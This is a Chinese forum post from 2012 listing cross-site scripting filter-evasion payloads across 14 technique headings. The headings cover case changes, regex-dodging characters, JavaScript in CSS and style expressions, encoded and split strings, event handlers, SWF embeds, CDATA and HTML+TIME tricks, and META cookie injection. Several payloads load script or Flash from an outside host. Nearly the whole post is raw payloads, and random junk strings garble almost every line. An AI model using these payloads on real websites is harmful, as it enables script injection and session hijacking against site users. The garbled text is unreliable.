1. 改变字符大小写3 k% K! w8 l3 Y, {2 z! B4 V# t: {
, V! A9 v: r( Q6 T' w$ K/ l) V: m [
, j$ o5 T4 d5 Y, R( e1 P
! a4 D. }( \4 g w+ h( K <sCript>alert(‘d’)</scRipT>
7 |5 i$ U/ {0 _. K0 G: X/ [& P" G
2. 利用多加一些其它字符来规避Regular Expression的检查
* r7 }( o0 |8 u! E( x7 X+ R" c( L& L) F( Y+ N, D
<<script>alert(‘c’)//<</script> {9 w- q% _% Z# E m" n' p' Y
; r+ v1 x& A: `3 N <SCRIPT a=">" SRC="t.js"></SCRIPT>
3 e" Z/ p! }# i; u. p/ f4 v, j
<SCRIPT =">" SRC="t.js"></SCRIPT>8 K! A9 t& X) Z5 t' N! K
1 L. r6 q2 z0 |9 S
<SCRIPT a=">" ” SRC="t.js"></SCRIPT>' l5 F! h3 m0 s5 M/ S4 f7 r4 O
W8 `4 E8 x, [2 P
<SCRIPT "a=’>’" SRC="t.js"></SCRIPT>
( }" P1 S- a! }7 d; f1 I- b. z, {! M2 X1 d3 F
<SCRIPT a=`>` SRC="t.js"></SCRIPT>9 p" R4 i. J) J7 C9 y( O
) H2 s1 X$ T4 n3 g8 x, _* F( h
<SCRIPT a=">’>" SRC="t.js"></SCRIPT>6 l; f5 t. O3 j/ ~6 k8 T9 s. o
. p6 y! V& C- ]6 r& R
3. 以其它扩展名取代.js
! W- x6 H5 L: i2 X4 f* j: N" R4 Z" y& V# S% u- K7 n
<script src="bad.jpg"></script>3 w. V9 C3 {% B* u1 I: P; t+ Q* _9 h
& g) v* _! `+ h4 f3 N4 {4. 将Javascript写在CSS档里& D/ t) F* {+ S+ Q0 ]- ~
" T6 p* e6 [6 c" w2 j
<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">
3 Q5 u% J6 F. S" u) a( P7 Z' a8 ?1 C3 Y4 [9 H6 F: w
example:; @0 E$ O4 l c* s4 ~9 j4 C
" X; K% A) N# F) I1 B body {
+ E6 K, d. Z0 Y/ t
8 [& A4 N A, a5 @: M$ q. U background-image: url(‘javascript:alert("XSS");’): V* a/ Z! v) k! _3 t
( Z5 `+ S" H% I! W/ y. r9 \) C
}
. v) N: h3 w' N3 F% R, G7 ?
! k+ y- X6 M) J3 A5. 在script的tag里加入一些其它字符
1 Z8 ~* B# R( J4 X
: |9 x3 v! ]; b0 _) c+ J; F, R <SCRIPT/SRC="t.js"></SCRIPT>
# k5 ~4 n( ]$ I7 s+ L( r E( K
: M: e$ `, z3 e, j& I <SCRIPT/anyword SRC="t.js"></SCRIPT>8 ~6 n1 X& r& o5 P1 V
* g8 o5 `4 k/ A* X7 K6. 使用tab或是new line来规避
[! ]6 p$ x" M* P; Y8 ]; Z) k& @2 C
<img src="jav ascr ipt:alert(‘XSS3′)">
* U( e n/ _; u' A5 t9 M2 E. G/ u$ m: ^ r) f' m. l
<img src="jav ascr ipt:alert(‘XSS3′)">
+ o1 M9 |. I. d4 G
2 f7 I: A) W K9 [0 A <IMG SRC="jav ascript:alert(‘XSS’);">
% J6 H, s' g3 G( R: V* [# g4 {$ L, Q7 o; k
-> tag' U" x+ }9 r% ]3 j
/ K% P5 ^" t0 T8 } -> new line4 Z: r `; Q( E- \$ k/ r! H
5 z b) |, `$ d* R
7. 使用"\"来规避& T) }- D( B+ h
$ z( G/ S1 E! z! l; X7 F7 ^9 B
<STYLE>@im\port’\ja\vasc\ript:alert("XSS32")’;</STYLE>! d6 _# Z& C N% ]* v6 h9 q" k
6 L- I+ ?4 |0 s2 O# F3 W
<IMG STYLE=’xss:expre\ssion(alert("XSS33"))’>
. K" ?* j) E0 T. I! D
, g+ i6 \3 e _ <IMG STYLE="xss:expr/*anyword*/ession(alert(‘sss’))">" r% i% |' D) ~
6 @9 b0 I0 L; R9 U" d) W, J0 g( D <DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">
7 w! ~5 k" M2 j! ~$ q! t7 o4 N9 N( }$ o% E& i5 h) F
<A STYLE=’no\xss:noxss("*//*"); xss:ex/*XSS*//*/*/pression(alert("XSS"))’>
* w+ i! t7 M* B$ w( {+ I6 M, J
! U* S- I) r$ @2 ?8. 使用Hex encode来规避(也可能会把";"拿掉)* v+ S& D' p4 O+ u0 {9 O9 {
$ W2 i+ j9 J f& c <DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">' E& V0 y! u7 H1 x% |4 Y" f. S
8 T5 T4 E4 t0 [( I
原始码:<DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">4 c, m ^6 E) h& C! s/ g/ B
+ F! Y! J1 A% Q; \" u$ U
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(‘abc’);">
& P: x( J% {3 E! H' C! b8 ? z5 c
& Y& T; K) s, `: g$ y& ^* m# D 原始码:<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(‘abc’);">
* l# O4 ^( [. F4 Z
& U1 w: ?3 \ y# v3 g9. script in HTML tag. b% j6 Z/ b; Y! m
* Q+ `8 p3 @5 r5 ]/ ~6 F <body onload=」alert(‘onload’)」>% {: F( h& B# n0 ~% ]6 B$ D, A
# {, u7 f8 a; ~ onabort, onactivate, onafterprint, onafterupdate, onbeforeactivate, onbeforecopy, onbeforecut, onbeforedeactivate, onbeforeeditfocus, onbeforepaste, onbeforeprint, onbeforeunload, onbeforeupdate, onblur, onbounce, oncellchange, onchange, onclick, oncontextmenu, oncontrolselect, oncopy, oncut, ondataavailable, ondatasetchanged, ondatasetcomplete, ondblclick, ondeactivate, ondrag, ondragend, ondragenter, ondragleave, ondragover, ondragstart, ondrop, onerror, onerrorupdate, onfilterchange, onfinish, onfocus, onfocusin, onfocusout, onhelp, onkeydown, onkeypress, onkeyup, onlayoutcomplete, onload, onlosecapture, onmousedown, onmouseenter, onmouseleave, onmousemove, onmouseout, onmouseover, onmouseup, onmousewheel, onmove, onmoveend, onmovestart, onpaste, onpropertychange, onreadystatechange, onreset, onresize, onresizeend, onresizestart, onrowenter, onrowexit, onrowsdelete, onrowsinserted, onscroll, onselect, onselectionchange, onselectstart, onstart, onstop, onsubmit, onunload( D2 H6 ^8 h' @) w7 u
: z( {1 N% @: ?) d7 V4 J10. 在swf里含有xss的code
% W. g( Z+ s" K0 E9 P* y- ~( L$ a0 ~0 ^ k9 f# e9 r ^' Z
<EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>
* l* i0 Y9 ^' v% A3 z- E. i$ g9 g. A; n7 U1 ~$ A3 Z
11. 利用CDATA将xss的code拆开,再组合起来。
9 ?! p7 n1 a. [2 F) ~
$ j) n z4 S2 v7 o2 R- ` <XML ID=I><X><C>" y# {& y: ~# R# _1 B1 L
# {1 Z0 U% T5 `/ ^$ K# h8 l
<![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>/ @- k% F6 s3 l5 y0 {
7 j& C/ N+ b8 h- r |; [/ e </C></X>* z1 Q" m2 f/ B: b
+ T1 W7 n9 k; m! g- M </xml>
' k" I/ |3 j5 T s6 @. v* K% y# ~; v0 Q3 E( _. {/ z- W. O
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
- f* w* t O" W" m! t5 U* @# D. o6 M0 F1 h) w
<XML ID="xss"><I><B><IMG SRC="javas<!– –>cript:alert(‘XSS’)"></B></I></XML>! V( ^( \& t0 ?& a
% N; m) Z7 \% M( ?3 T <SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
! x/ B. f! P, a: t. I- H+ j* k6 l# p
12. 利用HTML+TIME。
7 I! U, T' C2 H* {
: A# Q$ K0 @1 X( V, z* j <HTML><BODY>
* s! U: [7 T4 `3 u( M5 `
& B9 T0 ]! B6 V3 d" { ^& P7 Z <?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">
. Q, r. o6 d! O M0 s9 i
5 }+ \- H8 @* u- C! H% z* @4 N0 X8 H( M <?import namespace="t" implementation="#default#time2">
7 A9 u5 v# Z+ Y9 x5 T0 ^0 \- ]' \. |: e! Q B+ {/ O1 C* e) I
<t:set attributeName="innerHTML" to="anyword<SCRIPTDEFER>alert("XSS")</SCRIPT>">2 R" m7 ~/ g( K2 z+ g/ _5 l' l! k3 p
: i. z3 \7 T ]8 `
</BODY></HTML>
4 i8 k1 u* w- G! C' [* r# Q- N+ f9 ~7 r8 [% k7 U; W# [
13. 透过META写入Cookie。6 U/ A( Q* G! k, g. y4 k5 d
- C0 A3 ^6 L* K1 `; A
<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert(‘XSS’)</SCRIPT>">
4 U8 l1 b, c- E, @
+ S9 e9 ^0 N& f! r1 U14. javascript in src , href , url
9 ]. h1 d) y/ _( t" L* T
! x& B7 E! R$ k: D) H <IFRAME SRC=javascript:alert(’13′)></IFRAME>& D" J _' p2 M! R( J
v2 }" _$ Y- d4 h% l <img src="javascript:alert(‘XSS3′)">
3 d. C9 e, N5 R M; p+ u( K
% s) y7 ^. Q2 b1 k0 C4 o<IMG DYNSRC="javascript:alert(‘XSS20′)">
. c( [, L1 P/ a# `! q8 |& y* M
! P6 l9 r' ]& {1 V- ~2 s <IMG LOWSRC="javascript:alert(‘XSS21′)">' |2 l; C% L' x( q
F1 w! O0 @0 O <LINK REL="stylesheet" HREF="javascript:alert(‘XSS24′);">
6 U2 F, ]% X5 U9 Y2 c0 `) M# |. G1 v Q
<IFRAME SRC=javascript:alert(‘XSS27′)></IFRAME>
* ^3 Z R) O0 s2 W: e# H8 M: U d6 Z
<TABLE BACKGROUND="javascript:alert(‘XSS29′)">
0 @" o% H8 B) ]9 E+ z' m
6 [' o: i" }$ P/ c5 L7 V1 K6 m1 C <DIV STYLE="background-image: url(javascript:alert(‘XSS30′))">
" o9 M% z) R2 i! r4 H
6 r- f |: i: [3 L" N4 T7 o <STYLE TYPE="text/css">.XSS{background image:url("javascript:alert(‘XSS35′)");}
. q5 {/ ?: ^0 o# ?7 a: |9 e% |
1 {9 x- B8 w \# B7 U$ J; d" v </STYLE><A CLASS=XSS></A>
' W0 k/ S. `" g3 ~6 i! a9 O/ l# w2 @' `& T' {4 f& \6 a) G! m
<FRAMESET><FRAME SRC="javascript:alert(‘XSS’);"></FRAMESET>* c2 |% C! w( {) I, }9 e, d# b% O3 M! S8 y
8 ~& M, Q' b9 C- O* V$ r6 {3 t
|
发表于 2012-12-31 09:59:28
收藏
支持
反对